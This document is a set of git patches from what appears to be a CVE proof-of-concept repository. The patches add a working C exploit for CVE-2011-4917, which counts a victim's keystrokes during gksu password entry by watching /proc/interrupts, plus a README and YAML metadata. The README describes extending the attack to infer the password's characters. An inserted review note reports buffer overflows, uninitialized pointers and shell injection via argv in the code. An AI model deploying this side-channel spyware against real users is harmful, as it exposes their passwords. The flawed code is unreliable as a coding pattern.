From 86246ec2b473e5fdd982d5e7bacbfbf5626eea94 Mon Sep 17 00:00:00 2001
From: KunWang
Date: Tue, 11 Apr 2023 03:51:10 +0000
Subject: [PATCH 1/8] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202011?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
cve/linux-kernel/2011/.keep | 0
1 file changed, 0 insertions(+), 0 deletions(-)
create mode 100644 cve/linux-kernel/2011/.keep
diff --git a/cve/linux-kernel/2011/.keep b/cve/linux-kernel/2011/.keep
new file mode 100644
index 00000000..e69de29b
-- Gitee
From 4102a21f7600dcb59e120c9f783ca1d39550d8c5 Mon Sep 17 00:00:00 2001
From: KunWang
Date: Tue, 11 Apr 2023 03:53:36 +0000
Subject: [PATCH 2/8] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2011-4917?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
cve/linux-kernel/2011/CVE-2011-4917/.keep | 0
1 file changed, 0 insertions(+), 0 deletions(-)
create mode 100644 cve/linux-kernel/2011/CVE-2011-4917/.keep
diff --git a/cve/linux-kernel/2011/CVE-2011-4917/.keep b/cve/linux-kernel/2011/CVE-2011-4917/.keep
new file mode 100644
index 00000000..e69de29b
-- Gitee
From 9d148ec1b4b904c8a95970025646b17d9fff714e Mon Sep 17 00:00:00 2001
From: KunWang
Date: Tue, 11 Apr 2023 03:54:00 +0000
Subject: [PATCH 3/8] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
cve/linux-kernel/2011/yaml/.keep | 0
1 file changed, 0 insertions(+), 0 deletions(-)
create mode 100644 cve/linux-kernel/2011/yaml/.keep
diff --git a/cve/linux-kernel/2011/yaml/.keep b/cve/linux-kernel/2011/yaml/.keep
new file mode 100644
index 00000000..e69de29b
-- Gitee
From e3b68afcf3ec96bed07b7ca2e9749274d85dd6c2 Mon Sep 17 00:00:00 2001
From: KunWang
Date: Tue, 11 Apr 2023 03:54:09 +0000
Subject: [PATCH 4/8] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?linux-kernel/2011/.keep?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
cve/linux-kernel/2011/.keep | 0
1 file changed, 0 insertions(+), 0 deletions(-)
delete mode 100644 cve/linux-kernel/2011/.keep
diff --git a/cve/linux-kernel/2011/.keep b/cve/linux-kernel/2011/.keep
deleted file mode 100644
index e69de29b..00000000
-- Gitee
From 70511cebd501e2a981159f2b47eb38a0fdb8be39 Mon Sep 17 00:00:00 2001
From: KunWang
Date: Tue, 11 Apr 2023 03:56:06 +0000
Subject: [PATCH 5/8] =?UTF-8?q?=E4=BF=AE=E6=94=B9POC=20=E6=B7=BB=E5=8A=A0P?= =?UTF-8?q?OC?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
Signed-off-by: KunWang
---
cve/linux-kernel/2011/CVE-2011-4917/.keep | 0
.../2011/CVE-2011-4917/CVE-2011-4917.c | 178 ++++++++++++++++++
2 files changed, 178 insertions(+)
delete mode 100644 cve/linux-kernel/2011/CVE-2011-4917/.keep
create mode 100644 cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917.c
diff --git a/cve/linux-kernel/2011/CVE-2011-4917/.keep b/cve/linux-kernel/2011/CVE-2011-4917/.keep
deleted file mode 100644
index e69de29b..00000000
diff --git a/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917.c b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917.c
new file mode 100644
index 00000000..bab4fad3
--- /dev/null
+++ b/cve/linux-kernel/2011/CVE-2011-4917/CVE-2011-4917.c
@@ -0,0 +1,178 @@
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+
+int i8042_number;
+int ints[1024], ints_prev[1024], ints_delta[1024];
+
+char buffer[1024];
+
+int reread_ints(int *interrupts, int int_count, char **names)
+{
+ int i;
+ int n, c1, c2;
+ char s1[1024], s2[1024];
+
+ int interrupts_fd;
+ FILE *interrupts_file;
+
+ interrupts_fd = open("/proc/interrupts", O_RDONLY);
+ if (interrupts_fd == -1)
+ err(1, "open(\"/proc/interrupts\")");
+
+ interrupts_file = fdopen(interrupts_fd, "r");
+ if (interrupts_file == NULL)
+ err(1, "fdopen");
+
+ if (fseek(interrupts_file, 0, SEEK_SET) < 0)
+ err(1, "lseek");
+
+ fgets(buffer, sizeof(buffer), interrupts_file);
+
+ for (i = 0; i < int_count; i++) {
+ if (fgets(buffer, sizeof(buffer), interrupts_file) == NULL) {
+ fclose(interrupts_file);
+ return i;
+ }
+
+ if (sscanf(buffer, "%d: %d %d %s %s", &n, &c1, &c2, s1, s2) < 3) {
+ fclose(interrupts_file);
+ return i;
+ }
+
+ if (names != NULL && names[i] == NULL)
+ names[i] = strdup(s2);
+
+ interrupts[i] = c1 + c2;
+ }
+
+ fclose(interrupts_file);
+ return int_count;
+}
+
+void init_i8042_number(void)
+{
+ int i;
+ int can_be_keyboard[1024];
+ char *names[1024];
+ int number_of_interrups, can_be_keyboard_numbers;
+
+ number_of_interrups = reread_ints(ints_prev, sizeof(ints_prev), names);
+
+ /*
+ * Identify the i8042 interrupt associated with the keyboard by:
+ * 1) name should be i8042
+ * 2) interrupts count emitted in one second shouldn't be more than 100
+ */
+ for (i = 0; i < number_of_interrups; i++)
+ can_be_keyboard[i] = strcmp(names[i], "i8042") == 0;
+
+ while (1) {
+ sleep(1);
+ reread_ints(ints, sizeof(ints), NULL);
+
+ can_be_keyboard_numbers = 0;
+ for (i = 0; i < number_of_interrups; i++) {
+ can_be_keyboard[i] &= (ints[i] - ints_prev[i]) < 100;
+ if (can_be_keyboard[i])
+ can_be_keyboard_numbers++;
+
+ ints_prev[i] = ints[i];
+ }
+
+ if (can_be_keyboard_numbers == 1) {
+ for (i = 0; i < number_of_interrups; i++)
+ if (can_be_keyboard[i]) {
+ i8042_number = i;
+ printf("i8042 keyboard is #%d\n", i);
+ return;
+ }
+ }
+ }
+}
+
+int i8042_read(void)
+{
+ reread_ints(ints, sizeof(ints), NULL);
+ ints_prev[i8042_number] = ints[i8042_number];
+
+ return ints[i8042_number];
+}
+
+int wait_for_program(char *pname)
+{
+ FILE *f;
+ int pid;
+ char s[1024];
+
+ snprintf(s, sizeof(s), "while :; do pgrep %s >/dev/null && break;"
+ " sleep 0.1; done", pname);
+ system(s);
+ snprintf(s, sizeof(s), "pgrep %s", pname);
+ f = popen(s, "r");
+ if (f == NULL)
+ err(1, "popen");
+
+ if (fgets(buffer, sizeof(buffer), f) == NULL)
+ err(1, "fgets");
+
+ if (sscanf(buffer, "%d", &pid) < 1)
+ err(1, "sscanf");
+
+ pclose(f);
+
+ return pid;
+}
+
+int main(int argc, char *argv[])
+{
+ int n, old, sum, i;
+ int pid;
+ char *pname = argv[1];
+
+ if (argc < 2)
+ errx(1, "usage: spy-interrupts gksu");
+
+ puts("Waiting for mouse activity...");
+ init_i8042_number();
+
+ pid = wait_for_program(pname);
+ printf("%s is %d\n", pname, pid);
+
+ old = i8042_read();
+
+ sum = 0;
+
+ while (1) {
+ n = i8042_read();
+ if (old == n)
+ usleep(10000);
+ else {
+ for (i = 0; i < n-old; i++)
+ putchar('.');
+ fflush(stdout);
+ }
+
+ sum += n - old;
+ old = n;
+
+ if (kill(pid, 0) < 0 && errno == ESRCH)
+ break;
+ }
+
+ /*
+ * #interrupts == 2 * #keystrokes.
+ * #keystrokes = len(password) - 1 because of ENTER after the password.
+ */
+ printf("\n%d keystrokes\n", (sum-2)/2);
+
+ return 0;
+}
\ No newline at end of file
-- Gitee
From 8935efc390c5b846d5b626a9cb73b923185a9d18 Mon Sep 17 00:00:00 2001
From: KunWang
Date: Tue, 11 Apr 2023 03:56:45 +0000
Subject: [PATCH 6/8] add cve/linux-kernel/2011/CVE-2011-4917/README.md.
Signed-off-by: KunWang
---
cve/linux-kernel/2011/CVE-2011-4917/README.md | 14 ++++++++++++++
1 file changed, 14 insertions(+)
create mode 100644 cve/linux-kernel/2011/CVE-2011-4917/README.md
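Review bot: `init_i8042_number` passes `sizeof(ints_prev)` — a byte count, several times the element count on common ABIs — as `int_count` to `reread_ints`, which then indexes `interrupts[i]` and `names[i]` up to that bound, so a `/proc/interrupts` with more than 1024 lines writes past the 1024-element arrays; the two `reread_ints(ints, sizeof(ints), NULL)` calls in the same function and in `i8042_read` carry the same mismatch, and `can_be_keyboard[1024]` is afterwards indexed up to `number_of_interrups` too. Pass the element count instead, e.g. `reread_ints(ints_prev, sizeof(ints_prev) / sizeof(ints_prev[0]), names)`. In the same function `char *names[1024];` is never initialized, yet `reread_ints` only fills a slot when `names[i] == NULL` and the first loop hands `names[i]` to `strcmp`, so an indeterminate non-null pointer would be dereferenced; `char *names[1024] = {0};` closes that. `wait_for_program` interpolates `argv[1]` straight into the strings given to `system()` and `popen()`, so any shell metacharacter in the argument is executed as shell; since `pname` is only ever matched against a process name, rejecting anything outside a plain identifier charset before building the command, or running `pgrep` directly via `execvp`/`posix_spawn` with an explicit argv, avoids that. The `#include` lines show no header names here, which looks like a rendering loss rather than something in the commit.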
diff --git a/cve/linux-kernel/2011/CVE-2011-4917/README.md b/cve/linux-kernel/2011/CVE-2011-4917/README.md
new file mode 100644
index 00000000..d95ca27d
--- /dev/null
+++ b/cve/linux-kernel/2011/CVE-2011-4917/README.md
@@ -0,0 +1,14 @@
+A PoC for spying for keystrokes in gksu via /proc/interrupts in Linux <= 3.1.
+In the Linux kernel through 3.1 there is an information disclosure issue via /proc/stat.
+
+The file /proc/interrupts is world readable. It contains information about how many interrupts were emitted since the system boot. We may loop on one CPU core while the victim is executed on another, and learn the length of victim's passord via monitoring emitted interrupts' counters of the keyboard interrupt. The PoC counts only keystrokes number, but it can be easily extended to note the delays between the keystrokes and do the statistical analysis to learn the precise input characters.
+
+The limitations:
+ - it works on 2-core CPUs only.
+ - it works on 1-keyboard systems only.
+ - it doesn't carefully count the first and last keystrokes (e.g. ENTER after the password input).
+ - it doesn't carefully filter keystrokes after ENTER.
+
+run as: gcc -Wall spy-interrupts.c -o spy-interrupts && ./spy-interrupts gksu
+
+P.S. The harm of 0444 /proc/interrupts is known for a long time, but I was told about this specific attack vector by Tavis Ormandy just after similar PoC spy-sched was published.
\ No newline at end of file
-- Gitee
From 6200b18e0f91efbc91f42f03935b80e9f5674271 Mon Sep 17 00:00:00 2001
From: KunWang
Date: Tue, 11 Apr 2023 03:57:24 +0000
Subject: [PATCH 7/8] rename cve/linux-kernel/2011/yaml/.keep to cve/linux-kernel/2011/yaml/CVE-2011-4917.yaml.
Signed-off-by: KunWang
---
cve/linux-kernel/2011/yaml/.keep | 0
cve/linux-kernel/2011/yaml/CVE-2011-4917.yaml | 18 ++++++++++++++++++
2 files changed, 18 insertions(+)
delete mode 100644 cve/linux-kernel/2011/yaml/.keep
create mode 100644 cve/linux-kernel/2011/yaml/CVE-2011-4917.yaml
diff --git a/cve/linux-kernel/2011/yaml/.keep b/cve/linux-kernel/2011/yaml/.keep
deleted file mode 100644
index e69de29b..00000000
diff --git a/cve/linux-kernel/2011/yaml/CVE-2011-4917.yaml b/cve/linux-kernel/2011/yaml/CVE-2011-4917.yaml
new file mode 100644
index 00000000..255ddd17
--- /dev/null
+++ b/cve/linux-kernel/2011/yaml/CVE-2011-4917.yaml
@@ -0,0 +1,18 @@
+id: CVE-2011-4917
+source: https://www.openwall.com/lists/oss-security/2011/11/07/9
+info:
+ name: Linux内核是一个自由和开源的、单片的、模块化的、多任务的、类似Unix的操作系统内核。它最初是由Linus Torvalds在1991年为他的基于i386的PC编写的,它很快就被采纳为GNU操作系统的内核,GNU被写成一个自由(liber)的Unix替代品。
+ severity: medium
+ description: 在3.1版本的Linux内核中,存在一个通过/proc/stat的信息泄露问题。
+ scope-of-influence:
+ Linux kernel <= 3.1
+ reference:
+ - https://nvd.nist.gov/vuln/detail/cve-2011-4917
+ classification:
+ cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 5.5
+ cve-id: CVE-2011-4917
+ cwe-id: CWE-200
+ cnvd-id: None
+ kve-id: None
+ tags: information disclosure
\ No newline at end of file
-- Gitee
From a6d1708bf4aa1d8881aadafcbf8ed5db5228eb5c Mon Sep 17 00:00:00 2001
From: KunWang
Date: Tue, 11 Apr 2023 03:57:59 +0000
Subject: [PATCH 8/8] update other_list.yaml.
Signed-off-by: KunWang
---
other_list.yaml | 1 +
1 file changed, 1 insertion(+)
diff --git a/other_list.yaml b/other_list.yaml
index ede901d9..cf82c0bd 100644
--- a/other_list.yaml
+++ b/other_list.yaml
@@ -14,6 +14,7 @@ cve: - CVE-2020-27194 - CVE-2023-0179 - CVE-2018-18955 + - CVE-2011-4917 polkit: - CVE-2021-3560 Outlook:
-- Gitee